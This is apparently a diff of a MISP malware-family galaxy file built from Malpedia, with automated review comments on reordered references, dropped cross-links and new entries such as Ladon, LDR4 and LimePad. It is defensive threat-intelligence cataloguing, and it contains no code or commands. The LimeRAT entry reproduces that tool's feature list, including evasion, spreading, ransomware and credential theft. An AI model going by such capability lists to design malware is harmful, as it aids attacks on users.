- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
- "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack",
- "https://intel471.com/blog/privateloader-malware",
- "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
"https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
+ "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack",
+ "https://dissectingmalwa.re/osiris-the-god-of-afterlifeand-banking-malware.html",
+ "https://intel471.com/blog/privateloader-malware",
"https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/",
+ "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
+ "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/",
+ "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
+ "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
+ "https://unit42.paloaltonetworks.com/banking-trojan-techniques/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn",
+ "https://www.zscaler.com/blogs/security-research/ares-malware-grandson-kronos-banking-trojan",
+ "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/",
"https://therecord.media/osiris-banking-trojan-shuts-down-as-new-ares-variant-emerges/",
- "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
+ "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
+ "https://blog.morphisec.com/long-live-osiris-banking-trojan-targets-german-ip-addresses",
+ "https://twitter.com/3xp0rtblog/status/1294157781415743488",
+ "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/"
],
"synonyms": [
"Osiris"
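Review bot: Almost all of the churn in this hunk is a reorder of refs that were already present (the Securonix, dissectingmalwa.re and intel471 URLs move up while the Trend Micro Black Atlas, vx-underground and Morphisec URLs move to the bottom); the only new entry is "https://unit42.paloaltonetworks.com/banking-trojan-techniques/". If the refs array is regenerated from the upstream Malpedia data, emitting it in a stable (sorted) order would keep future diffs down to the real additions and make duplicates easier to spot in review.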
@@ -29113,8 +30669,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t",
- "https://0ffset.wordpress.com/2018/10/05/post-0x17-2-turla-keylogger/",
"https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-1/",
+ "https://0ffset.wordpress.com/2018/10/05/post-0x17-2-turla-keylogger/",
"https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-2/"
],
"synonyms": [],
@@ -29161,15 +30717,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "616c7c32-110e-4bb3-8e99-4c2aeb8f8272",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58",
"value": "Kurton"
},
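Review bot: Dropping the `related` block for Kurton removes its `similar` link to dest-uuid 616c7c32-110e-4bb3-8e99-4c2aeb8f8272 without a replacement, and the same removal recurs for Kwampirs and LatentBot further down in this patch. If the relationships are now maintained elsewhere, the commit message should say so, because MISP consumers that pivot on these cross-references lose them silently; if not, the generator should carry existing `related` entries over instead of discarding them.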
@@ -29191,41 +30738,46 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs",
- "https://www.zdnet.com/article/fbi-re-sends-alert-about-supply-chain-attacks-for-the-third-time-in-three-months/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
- "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia",
"https://resources.cylera.com/new-evidence-linking-kwampirs-malware-to-shamoon-apts",
"https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat",
- "https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf",
"http://www.documentcloud.org/documents/6821581-FLASH-CP-000111-MW-Downgraded-Version.html",
+ "https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf",
+ "https://thehackernews.com/2022/03/researchers-find-new-evidence-linking.html",
"https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/",
- "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/",
- "https://thehackernews.com/2022/03/researchers-find-new-evidence-linking.html"
+ "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
+ "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.zdnet.com/article/fbi-re-sends-alert-about-supply-chain-attacks-for-the-third-time-in-three-months/",
+ "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d1e548b8-4793-11e8-8dea-6beff82cac0a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3",
"value": "Kwampirs"
},
+ {
+ "description": "According to its self-description, Ladon is a multi-threaded plug-in comprehensive scanning artifact for large-scale network penetration, including port scanning, service identification, network assets, password blasting, high-risk vulnerability detection and one click getshell. It supports batch a segment / b segment / C segment and cross network segment scanning, as well as URL, host and domain name list scanning.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ladon",
+ "https://github.com/k8gege/Ladon",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5c63623b-aa84-41a5-9e3e-f338edf72291",
+ "value": "Ladon"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lalala_stealer",
- "https://securitynews.sonicwall.com/xmlpost/lalala-infostealer-which-comes-with-batch-and-powershell-scripting-combo/",
"https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html",
"https://twitter.com/luc4m/status/1276477397102145538",
+ "https://securitynews.sonicwall.com/xmlpost/lalala-infostealer-which-comes-with-batch-and-powershell-scripting-combo/",
"https://www.hornetsecurity.com/en/security-information/information-stealer-campaign-targeting-german-hr-contacts/"
],
"synonyms": [],
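Review bot: The new Ladon description reproduces the tool's own marketing text ("password blasting", "one click getshell", "batch a segment / b segment / C segment"), which reads as a machine translation of class A/B/C subnet scanning. Paraphrasing it into neutral terms (port and service scanning, credential brute forcing, vulnerability checks across /8, /16 and /24 ranges) would be clearer, and since Mandiant's M-Trends 2023 is among the refs, a sentence on the context in which the tool was observed would make the entry more useful than the self-description alone.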
@@ -29239,13 +30791,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert",
- "https://www.youtube.com/watch?v=jeLd-gw2bWo",
"https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7",
- "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://ti.qianxin.com/blog/articles/network-weapons-of-cia/",
"https://twitter.com/_CPResearch_/status/1484502090068242433",
- "https://ti.qianxin.com/blog/articles/network-weapons-of-cia/"
+ "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.youtube.com/watch?v=jeLd-gw2bWo",
+ "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/"
],
"synonyms": [
"Plexor"
@@ -29268,29 +30820,34 @@
"uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0",
"value": "Lamdelin"
},
+ {
+ "description": "Clipboard stealer.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.laplas",
+ "https://twitter.com/Gi7w0rm/status/1604999633792647169",
+ "https://blog.cyble.com/2022/11/02/new-laplas-clipper-distributed-by-smokeloader/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cc2c0c2a-b233-4d51-9e0a-ae91043c952c",
+ "value": "LaplasClipper"
+ },
{
"description": "FireEye describes this malware as a highly obfuscated bot that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.\r\n\r\nUsing Dynamic Threat Intelligence, they have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland – primarily in the financial services and insurance sectors. Although the infection strategy is not new, the final payload dropped – which they named LATENTBOT – caught attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot",
"https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/",
- "http://malware-traffic-analysis.net/2017/04/25/index.html",
+ "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access",
"https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html",
- "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/",
- "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access"
+ "http://malware-traffic-analysis.net/2017/04/25/index.html",
+ "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "635d260f-39d9-4d3f-99ec-d2560cb5d694",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0",
"value": "LatentBot"
},
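Review bot: The LaplasClipper description ("Clipboard stealer.") is too thin to be searchable; the Cyble ref URL already names SmokeLoader as the distribution vector, and a clipper's defining behaviour is substituting cryptocurrency wallet addresses on the clipboard rather than merely reading it, so one sentence covering both, as far as the refs support it, would help.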
@@ -29307,14 +30864,56 @@
"uuid": "e1958a69-49c3-43a2-ba80-6e5cd5bbcd13",
"value": "Laturo Stealer"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazardoor",
+ "https://asec.ahnlab.com/ko/40495/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1045b4f1-5a85-4448-a7a9-abc964bdae72",
+ "value": "LazarDoor"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarloader",
+ "https://securelist.com/bluenoroff-methods-bypass-motw/108383/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "42bce8d3-8705-44fb-bd88-4af16c6bd28f",
+ "value": "LazarLoader"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus_killdisk",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/",
+ "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/"
+ ],
+ "synonyms": [
+ "KillDisk.NBO"
+ ],
+ "type": []
+ },
+ "uuid": "6f377d0b-9eaa-474c-8cf8-0718ee2b0efc",
+ "value": "KillDisk (Lazarus)"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok",
"https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector",
- "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802",
- "https://www.gdatasoftware.com/blog/2015/05/24280-dissecting-the-kraken"
+ "https://www.gdatasoftware.com/blog/2015/05/24280-dissecting-the-kraken",
+ "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802"
],
"synonyms": [],
"type": []
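Review bot: LazarDoor and LazarLoader are added with empty descriptions although each carries a vendor ref (ASEC, Securelist) that could supply a one-sentence summary; empty descriptions exist elsewhere in the file, but new entries need not inherit that. For the "KillDisk (Lazarus)" entry, please check that no other cluster already uses the value "KillDisk" or the synonym "KillDisk.NBO", since the parenthetical name suggests a deliberate split from a generic KillDisk entry and that relationship is not recorded anywhere in the entry.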
@@ -29341,10 +30940,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot",
- "https://securelist.com/lazarus-trojanized-defi-app/106195/",
+ "https://research.nccgroup.com/2022/05/05/north-koreas-lazarus-and-their-initial-access-trade-craft-using-social-media-and-social-engineering/",
"https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html",
- "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf",
- "https://research.nccgroup.com/2022/05/05/north-koreas-lazarus-and-their-initial-access-trade-craft-using-social-media-and-social-engineering/"
+ "https://securelist.com/lazarus-trojanized-defi-app/106195/",
+ "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf"
],
"synonyms": [],
"type": []
@@ -29352,6 +30951,19 @@
"uuid": "23dd327e-5d1d-4b75-993e-5d79d9fc0a70",
"value": "LCPDot"
},
+ {
+ "description": "A further branch of the URSNIF collection of malware families. According to Mandiant, it no longer has focus on banking fraud but generic backdoor capabilities instead.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ldr4",
+ "https://www.mandiant.com/resources/blog/rm3-ldr4-ursnif-banking-fraud"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c429622f-cbdf-47d6-88e8-091283ed5703",
+ "value": "LDR4"
+ },
{
"description": "Ransomware.",
"meta": {
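Review bot: Wording nit in the LDR4 description: "it no longer has focus on banking fraud but generic backdoor capabilities instead" would read better as "according to Mandiant it no longer focuses on banking fraud and instead provides generic backdoor capabilities", which is also what the cited Mandiant blog title (rm3-ldr4-ursnif-banking-fraud) points at.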
@@ -29384,19 +30996,19 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lemonduck",
"https://therecord.media/lemonduck-botnet-evolves-to-allow-hands-on-keyboard-intrusions/",
- "https://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html",
- "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
- "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/",
- "https://www.bitdefender.com/files/News/CaseStudies/study/373/Bitdefender-PR-Whitepaper-LemonDuck-creat4826-en-EN-GenericUse.pdf",
- "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/",
"https://cybotsai.com/lemon-duck-attack/",
"https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/",
- "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
- "https://news.sophos.com/en-us/2019/10/01/lemon_duck-powershell-malware-cryptojacks-enterprise-networks/",
- "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/",
- "https://success.trendmicro.com/solution/000261916",
"https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
- "https://asec.ahnlab.com/en/31811/"
+ "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
+ "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/",
+ "https://news.sophos.com/en-us/2019/10/01/lemon_duck-powershell-malware-cryptojacks-enterprise-networks/",
+ "https://asec.ahnlab.com/en/31811/",
+ "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/",
+ "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
+ "https://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/373/Bitdefender-PR-Whitepaper-LemonDuck-creat4826-en-EN-GenericUse.pdf",
+ "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/",
+ "https://success.trendmicro.com/solution/000261916"
],
"synonyms": [],
"type": []
@@ -29425,9 +31037,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic",
+ "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html",
"http://www.malware-traffic-analysis.net/2017/11/02/index.html",
- "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/",
- "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html"
+ "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/"
],
"synonyms": [],
"type": []
@@ -29448,15 +31060,28 @@
"uuid": "007697bc-463e-4f90-93e3-8f8fdeff147a",
"value": "LetMeOut"
},
+ {
+ "description": "LgoogLoader is an installer that drops three files: a batch file, an AutoIt interpreter, and an AutoIt script. After downloading, it executes the batch file.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lgoogloader",
+ "https://blog.polyswarm.io/nullmixer-drops-multiple-malware-families"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "edf1bb94-cc6b-46fd-a922-18fd2a0f323f",
+ "value": "LgoogLoader"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.liderc",
"https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf",
+ "https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media",
"https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html",
- "https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/",
- "https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media"
+ "https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/"
],
"synonyms": [
"LEMPO"
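Review bot: The LgoogLoader description leaves the subject of "After downloading" ambiguous: it is unclear whether the loader downloads the three dropped files or the batch file retrieves a further payload. Since the only non-Malpedia ref is the PolySwarm NullMixer write-up, stating that it was observed as one of the families dropped by NullMixer would anchor the entry to its source.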
@@ -29466,19 +31091,32 @@
"uuid": "ed825d46-be1e-4d36-b828-1b85274773dd",
"value": "Liderc"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightbunny",
+ "https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ea790924-8a81-4141-9e5c-14a205af170f",
+ "value": "LIGHTBUNNY"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lightneuron",
- "https://securelist.com/apt-trends-report-q2-2018/86487/",
- "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/",
- "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments",
- "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf",
"https://www.secureworks.com/research/threat-profiles/iron-hunter",
+ "https://securelist.com/apt-trends-report-q2-2018/86487/",
"https://www.welivesecurity.com/2019/05/07/turla-lightneuron-email-too-far/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf"
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments",
+ "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/",
+ "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf"
],
"synonyms": [
"NETTRANS",
@@ -29521,15 +31159,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith",
- "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
- "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/",
- "https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt",
"https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/",
+ "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/",
"https://github.com/werkamsus/Lilith",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf"
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf",
+ "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
+ "https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt",
+ "https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479"
],
"synonyms": [],
"type": []
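Review bot: The Lilith refs still contain the same Talos SideCopy PDF twice, once as "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf" and once with the "?1625657388" cache-buster appended; only one should be kept, and the generator should normalise query strings before deduplicating, since the same pattern affects the Network_IOCs_list URL.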
@@ -29563,26 +31202,41 @@
"uuid": "3819bc21-8c15-48ee-8e68-ee2a0c5f82a7",
"value": "limeminer"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.limepad",
+ "https://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0cae4bcd-9656-434d-81c1-c55801b3eaa3",
+ "value": "LimePad"
+ },
{
"description": " ## Description\r\n Simple yet powerful RAT for Windows machines. This project is simple and easy to understand, It should give you a general knowledge about dotNET malwares and how it behaves. \r\n \r\n ---\r\n\r\n## Main Features\r\n\r\n- **.NET**\r\n - Coded in Visual Basic .NET, Client required framework 2.0 or 4.0 dependency, And server is 4.0\r\n- **Connection**\r\n - Using pastebin.com as ip:port , Instead of noip.com DNS. And Also using multi-ports\r\n- **Plugin**\r\n - Using plugin system to decrease stub's size and lower the AV detection\r\n- **Encryption**\r\n - The communication between server & client is encrypted with AES\r\n- **Spreading**\r\n - Infecting all files and folders on USB drivers\r\n- **Bypass**\r\n - Low AV detection and undetected startup method\r\n- **Lightweight**\r\n - Payload size is about 25 KB\r\n- **Anti Virtual Machines**\r\n - Uninstall itself if the machine is virtual to avoid scanning or analyzing \r\n- **Ransomware**\r\n - Encrypting files on all HHD and USB with .Lime extension\r\n- **XMR Miner**\r\n - High performance Monero CPU miner with user idle\\active optimizations\r\n- **DDoS**\r\n - Creating a powerful DDOS attack to make an online service unavailable\r\n- **Crypto Stealer**\r\n - Stealing Cryptocurrency sensitive data\r\n- **Screen-Locker**\r\n - Prevents user from accessing their Windows GUI \r\n - **And more**\r\n - On Connect Auto Task\r\n\t- Force enable Windows RDP\r\n\t- Persistence\r\n - File manager\r\n - Passowrds stealer\r\n - Remote desktop\r\n - Bitcoin grabber\r\n - Downloader\r\n - Keylogger",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat",
- "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
- "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
- "https://github.com/NYAN-x-CAT/Lime-RAT/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html",
- "https://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
- "https://lab52.io/blog/apt-c-36-recent-activity-analysis/",
"https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html",
"https://blog.reversinglabs.com/blog/rats-in-the-library",
- "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
- "https://www.youtube.com/watch?v=x-g-ZLeX8GM",
+ "https://any.run/cybersecurity-blog/limerat-malware-analysis/",
+ "https://lab52.io/blog/apt-c-36-recent-activity-analysis/",
"https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service",
+ "https://www.youtube.com/watch?v=x-g-ZLeX8GM",
+ "https://github.com/NYAN-x-CAT/Lime-RAT/",
+ "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/",
"https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
"https://blog.yoroi.company/research/limerat-spreads-in-the-wild/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt"
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/"
],
"synonyms": [],
"type": []
@@ -29620,8 +31274,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks",
- "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+ "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks"
],
"synonyms": [],
"type": []
@@ -29648,9 +31302,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp",
- "https://viriback.com/recent-litehttp-activities-and-iocs/",
+ "https://malware.news/t/recent-litehttp-activities-and-iocs/21053",
"https://github.com/zettabithf/LiteHTTP",
- "https://malware.news/t/recent-litehttp-activities-and-iocs/21053"
+ "https://viriback.com/recent-litehttp-activities-and-iocs/"
],
"synonyms": [],
"type": []
@@ -29658,121 +31312,152 @@
"uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8",
